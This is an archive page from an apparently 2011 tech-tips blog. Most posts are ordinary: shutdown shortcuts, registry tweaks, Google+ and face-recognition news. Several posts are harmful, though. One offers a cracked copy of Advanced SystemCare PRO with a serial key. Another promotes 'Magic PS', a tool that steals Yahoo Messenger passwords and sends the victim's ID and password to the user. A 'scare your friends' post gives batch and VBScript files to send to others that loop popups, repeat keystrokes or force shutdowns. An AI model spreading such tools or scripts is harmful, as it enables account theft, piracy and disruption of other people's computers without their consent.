Skip to main content

Posts

Showing posts from July, 2011

Download Free Advanced SystemCare PRO 4.0.1 Full with Serial Key

For complete Pack Of Advanced System Care Pro, You have to download two Files. 1-Advanced SystemCare PRO 4.0.1 Pro.exe (29.51 MB) 2-Download Serial KEY And Instruction HERE (102 KB)  - For Detail Instruction Of Advanced System Care Pro CLICK HERE

Magic PS v1.5 SE FINAL- Hack Password Yahoo Messenger 10 {Please,Don't share with any one.....!}

Magic PS v1.5 SE FINAL is a tool to hack yahoo messenger password. You can use it to get password for any yahoo messenger ID. Magic PS v1.5 is a Powerfull Password Sender for Yahoo! Messenger.  Magic PS v1.5 sends victim id %26 pass to your id. It work without any smtp and script Working tested on Win98, Me, NT, 2000, XP and Vista-7 OSs. I'm giving this app just for user request and for ethical use and plz do not ask me how to use Magic PS application.  Free Download Link for Magic PS v1.5 SE FINAL Hack Password Yahoo Messenger 10:   Magic PS v1.5 (223 KB)

Google+ Now Open to Use For all Free - Only Trick Tech News Update

Recently launched Google+ is a hot topic these days and everyone waiting to get the invitation to access in Google+ project. Google was made access to this new networking service was limited and to invites only. From the date of launch all just trying to get invites for Google+ social network. Though Google still not announced for official but its opened up the Google+ to everyone. To join Google+ project you need just a Google account (your gmail id) and you can now sign up for the Google+ Homepage . Not everyone can see the Sign-in button when they visit the page and might just see a 'Keep me posted' link instead. Here a few ways of getting in without an invite for those of who are still out of the Google+ invitaion.  According to Google the Google+ project is still in its early stages and in limited Field Trial. Right now, we're testing with a small number of people, but it won't be long before the Google+ project is ready for everyone. Leave us your emai

Luxand Blink Pro: Login To Your PC Using Face Recognition System

Do you get bored to select your username and then enter a password to every time you login? Not in old versions of windows but also in newly Windows 7. Why has there not been a built-in Windows feature to change the way of users login to Windows? Here you need Luxand Blink! Pro.  Every new version of Windows brings improvements over its previous versions like interface, desktop customization, handling files, or security but why the Welcome Screen and the way users login still unchanged. Don't worry we've an alternative to traditional Windows login which known as Luxand Blink. It provides its users with a different way i.e. through facial recognition to login to Windows.  Luxand Blink starts running after the computer starts up but before it has logged on to any account. We can then look into the webcam and have our face recognized by the application. It uses its advance image recognition algorithms to recognize our face. Such is the competence of this application, that whether

Visidon AppLock for Android to Secure Your Phone Using Facial Recognition

AppLock is a fast, convenient and cool way to protect your mobile with face recognition. With this free app you can protect any application (i.e. SMS, Gallery, E-Mail, Facebook, etc.) on your phone using face recognition. Convenient and cool way to increase safety of your private apps and content.  Visidon AppLock lets you choose the apps to be protected. Your face is a key to open them! Application uses the frontal camera of your mobile and verifies in real-time that the face matches the one allowed to access the private apps.  We've the facial recognition login system for pc/notebooks but its first app which provides facial recognition based security to your Android smartphones for free. This free app simply allow you to use your face as your password. You must have a front facing camera in your device to use the face recognition feature. Otherwise it is disabled and you are only able to use password verification. Its a high level of mobile security and you just need an Android

Test Your Eyesight With Your Mobile Phones

Now you no longer need to go else where to test eyes coz its possible to test your eyes with your mobile phone. MIT Media Lab researchers have created a very simple, fast and inexpensive way to use mobile phones to measure refractive errors of the eye, including nearsightedness, farsightedness, astigmatism, and age-related vision loss. Now its no need of specialized equipment operated by a trained professional and all you can do at home with your mobile phone.  NETRA (Near-Eye Tool for Refractive Assessment), is a project of the Media Lab's Camera Culture research group. A small plastic device which currently can be produced for less than US$2. This can easily clipped onto a mobile phone screen. To use it, simply hold the device up to the eye, look into it, and use the phone’s keypad until two patterns overlap. This is repeated several times per eye, with the patterns at different angles. In this process software loaded onto the phone computes and provides the data needed to create

One-click PC shut down

This is really very easy one but very effective one. Enjoy it! First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC. But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this shutdown -r -t 01 -c “Rebooting your PC” Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message “Rebooting your PC.” The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use. I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use: shutdown -s -t 03 -c “Bye Bye!” shutdo

Countdown timer for shutdown computer

Many a times people like to sleep on music, but the problem is that the comp will continue running the whole night. Here is how you can create a countdown timer to shutdown your comp in your specified time. Go to run in start menu and input this command   shutdown -s -t 3600 this will create a countdown timer which will go off in 3600 seconds (1 Hour). you can replace the 3600 to any time limit you want the comp to shutdown ,but remember the time should always be expressed in seconds i.e if u want the comp to shutdown in Half an hour you have to write 1800 and so on... If you are as lazy as me and don't want to input the command each time, then create a batch file or shortcut Batch: open a notepad and type shutdown -s -t 3600 now in the files menu select "save as" and save this file as Activate.bat Just double clicking this file will activate your timer Shortcut: On the desktop right click and create a new shortcut. in the location type shutdown -s -t 3600 Give it an

10 Great NotePad Tricks To Scare Your Friends

Most of you must be aware about a tool called notepad. It is a simple text based editor. But today I am going to discuss some cool tricks which you can perform on your computer using notepad. You can also use these tricks to scare your friends. 1.Cycle a message in your friend’s computer. Type : @ECHO off :Begin msg * Hi msg * Are you having fun? msg * I am! msg * Lets have fun together! msg * Because you have been o-w-n-e-d GOTO BEGIN Save it and... as pc.bat and send it to your friends. 2.Make Keyboard Keys Type Continuously: Type : MsgBox “stop me..! if you can” Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{bs}” loop Save it as pc.vbs and send it to your friends. 3.Convey your friend a message and shut down his/ her computer. Type : @echo off msg * I don’t like you shutdown -c “Hahahah You are Doomed” -s Save it as pc.bat and send it to your friends. 4.Toggle your friend’s Caps Lock button simultaneously Type : Set wshShell =wscri

How to Use Multiple Google Account in Chrome

Google has infiltrated into our digital lives so much. It is almost difficult to think anything without Google. We are dependent on the Google for finding information on the internet as well as using its many products like Gmail, Calendar, Buzz, Reader, etc. Most of the products didn’t allow multiple logins thus today we will tell you a lesser known feature of Google Chrome web browser. This is called as incognito mode. This mode is similar to InPrivate browsing mode of Internet Explorer. When you open a new incognito window then all the cookies from the standard session are not saved and you can open your other Google account. The shortcut to open this mode is Ctrl+Shift+N. More details about this mode can be obtained from the help center of Chrome. It describes this mode as the mode in which all your browsing history and downloads will not be tracked. A simple blank cookie will be generated at the start of the session and it will be destroyed at the end of your incognit

5 Great Registry Hacks

Today I am going to tell you about 5 great registry hacks which will help you improve your system features and performance. 1. Security : USB Drives are one of the major tool through which data transfer takes place. In order to protect your data from getting stolen from you computer with the help of a USB drive you can make the USB drives read only. Go to  ‘ HKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies ‘ and   create a new DWORD value ‘ WriteProtect ‘ and set its value to 1. This will enable you to read from USB drives, but you won’t be able to copy data to it. 2. Sorting Files : Quite often you want the files to appear according to their names in explorer. In order to restore the ASCII file ordering, perform the following hack : Go to ‘HKLM\Software\Microsoft\Windows\Currentversion\Policies\Explorer’ and create a new DWORD value called as ‘NoStrCmpLogical’ and set its value to 1. 3 . Speeding Up Menu loading time : In order to make your menus load faster, perf